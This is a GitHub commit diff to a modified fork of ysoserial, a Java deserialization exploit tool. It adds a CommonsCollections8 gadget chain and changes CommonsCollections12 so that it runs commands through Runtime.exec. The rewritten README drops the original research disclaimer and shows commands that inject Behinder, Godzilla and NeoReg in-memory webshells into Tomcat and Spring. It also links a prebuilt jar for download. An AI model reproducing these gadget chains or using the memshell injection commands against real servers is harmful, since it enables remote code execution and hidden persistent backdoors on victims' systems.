add cc8 && update readme

syslaowang · Apr 11, 2022 · 9c8618e · 9c8618e
1 parent 4eea953
commit 9c8618e
Show file tree

Hide file tree

Showing 4 changed files with 73 additions and 87 deletions.
diff --git a/README.md b/README.md
@@ -1,40 +1,6 @@
 # ysoserial
 
-[![Join the chat at https://gitter.im/frohoff/ysoserial](
-https://badges.gitter.im/frohoff/ysoserial.svg)](
-https://gitter.im/frohoff/ysoserial?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
-[![Download Latest Snapshot](https://img.shields.io/badge/download-master-green.svg)](
-https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)
-[![Travis Build Status](https://api.travis-ci.org/frohoff/ysoserial.svg?branch=master)](https://travis-ci.org/frohoff/ysoserial)
-[![Appveyor Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
-
-A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
-
-![logo](ysoserial.png)
-
-## Description
-
-Originally released as part of AppSecCali 2015 Talk
-["Marshalling Pickles: how deserializing objects will ruin your day"](
-https://frohoff.github.io/appseccali-marshalling-pickles/)
-with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x). Later
-updated to include additional gadget chains for
-[JRE <= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) and several other libraries.
-
-__ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common java
-libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of
-objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then
-serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes
-this data, the chain will automatically be invoked and cause the command to be executed on the application host.
-
-It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
-gadgets on the classpath.
-
-## Disclaimer
-
-This software has been created purely for the purposes of academic research and for the development of effective
-defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project
-maintainers are not responsible or liable for misuse of the software. Use responsibly.
+ysoserial修改版，着重修改`ysoserial.payloads.util.Gadgets.createTemplatesImpl`使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。
 
 ## Usage
 
@@ -43,8 +9,8 @@ $  java -jar ysoserial.jar
 Y SO SERIAL?
 Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
   Available payload types:
-三月 30, 2022 10:42:22 下午 org.reflections.Reflections scan
-信息: Reflections took 115 ms to scan 1 urls, producing 22 keys and 174 values
+四月 11, 2022 2:52:36 下午 org.reflections.Reflections scan
+信息: Reflections took 77 ms to scan 1 urls, producing 22 keys and 184 values
      Payload                 Authors                                Dependencies
      -------                 -------                                ------------
      AspectJWeaver           @Jang                                  aspectjweaver:1.9.2, commons-collections:3.2.2
@@ -56,12 +22,14 @@ Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
      CommonsBeanutils183NOCC @Y4er                                  commons-beanutils:1.8.3
      CommonsBeanutils192NOCC @Y4er                                  commons-beanutils:1.9.2
      CommonsCollections1     @frohoff                               commons-collections:3.1
+     CommonsCollections12    @Y4er                                  commons-collections:3.1
      CommonsCollections2     @frohoff                               commons-collections4:4.0
      CommonsCollections3     @frohoff                               commons-collections:3.1
      CommonsCollections4     @frohoff                               commons-collections4:4.0
      CommonsCollections5     @matthias_kaiser, @jasinner            commons-collections:3.1
      CommonsCollections6     @matthias_kaiser                       commons-collections:3.1
      CommonsCollections7     @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
+     CommonsCollections8     @navalorenzo                           commons-collections4:4.0
      FileUpload1             @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
      Groovy1                 @frohoff                               groovy:2.3.9
      Hibernate1              @mbechler
@@ -87,8 +55,6 @@ Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
 
 ## 内存马相关
 
-着重修改`ysoserial.payloads.util.Gadgets.createTemplatesImpl`使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。
-
 以CommonsBeanutils192NOCC为例：
 
 ```shell
@@ -99,14 +65,15 @@ java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromJ
 java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromThread"    # TomcatFilterMemShellFromThread  适用于tomcat7-9
 java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromJMX"     # TomcatListenerMemShellFromJMX
 java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromThread"  # TomcatListenerMemShellFromThread
+java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerNeoRegFromThread"    # TomcatListenerNeoRegFromThread     python neoreg.py -k fuckyou
 java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:SpringInterceptorMemShell"         # SpringInterceptorMemShell       链接shell需要使用存在的路由
 java -jar ysoserial.jar CommonsBeanutils192NOCC "FILE:E:\Calc.class"                      # ClassLoaderTemplate
 java -jar ysoserial.jar CommonsBeanutils192NOCC "calc"                                    # CommandTemplate                 CLASS: FILE: 不使用协议开头则默认为执行cmd
 ```
 
 一键注入cmdshell、冰蝎、哥斯拉内存马，shell连接使用请查看指定类。解决了request和response包装类导致冰蝎链接失败的问题，[见issue](https://github.com/rebeyond/Behinder/issues/187)。
 
-以下受到Gadgets.createTemplatesImpl影响的gadget均需要如上方式传递参数：
+以下受到`Gadgets.createTemplatesImpl`影响的gadget均需要如上方式传递参数：
 
 1. Click1
 2. CommonsBeanutils1
@@ -127,46 +94,17 @@ java -jar ysoserial.jar CommonsBeanutils192NOCC "calc"
 17. Spring2
 18. Vaadin1
 
-## Examples
-
-```shell
-$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
-0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
-0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
-0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
-...
-0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
-0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
-0000570: 0078 7071 007e 003a                      .xpq.~.:
-
-$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
-$ nc 10.10.10.10 1099 < groovypayload.bin
-
-$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
-```
+## 下载
 
-## Installation
+1. [点我下载打包好的jar包](https://ysoserial.y4er.com/ysoserial-0.0.6-SNAPSHOT-all.jar)
 
-1. Download the latest jar from
-   [JitPack](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)
-   [![Download Latest Snapshot](https://img.shields.io/badge/download-master-green.svg)](
-   https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)
-
-Note that GitHub-hosted releases were removed in compliance with the
-[GitHub Community Guidelines](
-https://help.github.com/articles/github-community-guidelines/#what-is-not-allowed)
 
 ## Building
 
 Requires Java 1.7+ and Maven 3.x+
 
 ```mvn clean package -DskipTests```
 
-## Code Status
-
-[![Build Status](https://travis-ci.org/frohoff/ysoserial.svg?branch=master)](https://travis-ci.org/frohoff/ysoserial)
-[![Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
-
 ## Contributing
 
 1. Fork it
@@ -177,8 +115,4 @@ Requires Java 1.7+ and Maven 3.x+
 
 ## See Also
 
-* [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet): info on
-  vulnerabilities, tools, blogs/write-ups, etc.
-* [marshalsec](https://github.com/frohoff/marshalsec): similar project for various Java deserialization
-  formats/libraries
-* [ysoserial.net](https://github.com/pwntester/ysoserial.net): similar project for .NET deserialization
+* [frohoff/ysoserial](https://github.com/frohoff/ysoserial)
diff --git a/src/main/java/ysoserial/payloads/CommonsCollections12.java b/src/main/java/ysoserial/payloads/CommonsCollections12.java
@@ -6,6 +6,8 @@
 import org.apache.commons.collections.functors.InvokerTransformer;
 import org.apache.commons.collections.keyvalue.TiedMapEntry;
 import org.apache.commons.collections.map.LazyMap;
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.util.PayloadRunner;
 import ysoserial.payloads.util.Reflections;
 
@@ -15,6 +17,9 @@
 import java.util.HashSet;
 import java.util.Map;
 
+@SuppressWarnings({"rawtypes", "unchecked"})
+@Dependencies({"commons-collections:commons-collections:3.1"})
+@Authors({Authors.Y4ER})
 public class CommonsCollections12 extends PayloadRunner implements ObjectPayload<Object> {
     public static void main(String[] args) throws Exception {
         PayloadRunner.run(CommonsCollections12.class, args);
@@ -26,17 +31,7 @@ public Object getObject(String command) throws Exception {
             new ConstantTransformer(ScriptEngineManager.class),
             new InvokerTransformer("newInstance", new Class[0], new Object[0]),
             new InvokerTransformer("getEngineByName", new Class[]{String.class}, new Object[]{"js"}),
-            new InvokerTransformer("eval", new Class[]{String.class}, new Object[]{
-                "var cmd = [];\n" +
-                "var command = '" + command + "';\n" +
-                "var osname = java.lang.System.getProperty('os.name');\n" +
-                "osname = osname.toLowerCase();\n" +
-                "if (osname.startsWith('win')) {\n" +
-                "    cmd = ['cmd.exe', '/c', command];\n" +
-                "} else {\n" +
-                "    cmd = ['bash', '-c', command];\n" +
-                "}\n" +
-                "java.lang.Runtime.getRuntime().exec(cmd)"}),
+            new InvokerTransformer("eval", new Class[]{String.class}, new Object[]{"java.lang.Runtime.getRuntime().exec('" + command + "');"})
         };
 
         Transformer transformerChain = new ChainedTransformer(transformers);

diff --git a/src/main/java/ysoserial/payloads/CommonsCollections8.java b/src/main/java/ysoserial/payloads/CommonsCollections8.java
@@ -0,0 +1,56 @@
+package ysoserial.payloads;
+
+import org.apache.commons.collections4.bag.TreeBag;
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+/*
+	Gadget chain:
+        org.apache.commons.collections4.bag.TreeBag.readObject
+        org.apache.commons.collections4.bag.AbstractMapBag.doReadObject
+        java.util.TreeMap.put
+        java.util.TreeMap.compare
+        org.apache.commons.collections4.comparators.TransformingComparator.compare
+        org.apache.commons.collections4.functors.InvokerTransformer.transform
+        java.lang.reflect.Method.invoke
+        sun.reflect.DelegatingMethodAccessorImpl.invoke
+        sun.reflect.NativeMethodAccessorImpl.invoke
+        sun.reflect.NativeMethodAccessorImpl.invoke0
+        com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer
+            ... (TemplatesImpl gadget)
+        java.lang.Runtime.exec
+ */
+@SuppressWarnings({"rawtypes", "unchecked"})
+@Dependencies({"org.apache.commons:commons-collections4:4.0"})
+@Authors({Authors.NAVALORENZO})
+public class CommonsCollections8 extends PayloadRunner implements ObjectPayload<TreeBag> {
+
+    public static void main(final String[] args) throws Exception {
+        PayloadRunner.run(CommonsCollections8.class, args);
+    }
+
+    public TreeBag getObject(final String command) throws Exception {
+        Object templates = Gadgets.createTemplatesImpl(command);
+
+        // setup harmless chain
+        final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
+
+        // define the comparator used for sorting
+        TransformingComparator comp = new TransformingComparator(transformer);
+
+        // prepare CommonsCollections object entry point
+        TreeBag tree = new TreeBag(comp);
+        tree.add(templates);
+
+        // arm transformer
+        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
+
+        return tree;
+    }
+
+}
diff --git a/src/main/java/ysoserial/payloads/annotation/Authors.java b/src/main/java/ysoserial/payloads/annotation/Authors.java
@@ -26,6 +26,7 @@
     String EDOARDOVIGNATI = "EdoardoVignati";
     String JANG = "Jang";
     String ARTSPLOIT = "artsploit";
+    String NAVALORENZO = "navalorenzo";
 
     String[] value() default {};